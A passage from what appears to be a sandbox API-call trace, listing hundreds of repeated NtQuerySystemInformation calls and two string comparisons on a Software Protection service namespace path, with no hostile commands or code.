ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.873] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.874] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdba0, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.875] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda90, Length=0x50, ResultLength=0x0) [0216.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.876] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7f0, Length=0x28, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd860, Length=0x28, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0216.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.885] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8e0, Length=0x28, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0216.886] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x20, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9c0, Length=0x38, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x20, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0216.887] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x20, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.888] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0216.889] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.889] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.890] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.894] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.895] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0216.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.896] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0216.898] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.899] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.900] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0216.901] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdbd0, Length=0x28, ResultLength=0x0) [0216.902] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.902] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdc50, Length=0x50, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.903] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.908] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9b0, Length=0x28, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda20, Length=0x28, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0216.909] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.006] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdaa0, Length=0x28, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd980, Length=0x20, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.007] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb80, Length=0x38, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda00, Length=0x20, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd990, Length=0x20, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.008] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.009] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.017] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd950, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x50, ResultLength=0x0) [0217.018] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.019] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5a0, Length=0x28, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd610, Length=0x28, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.210] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd770, Length=0x38, ResultLength=0x0) [0217.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.211] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0217.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd690, Length=0x28, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd530, Length=0x20, ResultLength=0x0) [0217.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd4b0, Length=0x20, ResultLength=0x0) [0217.214] NtQuerySystemInformation 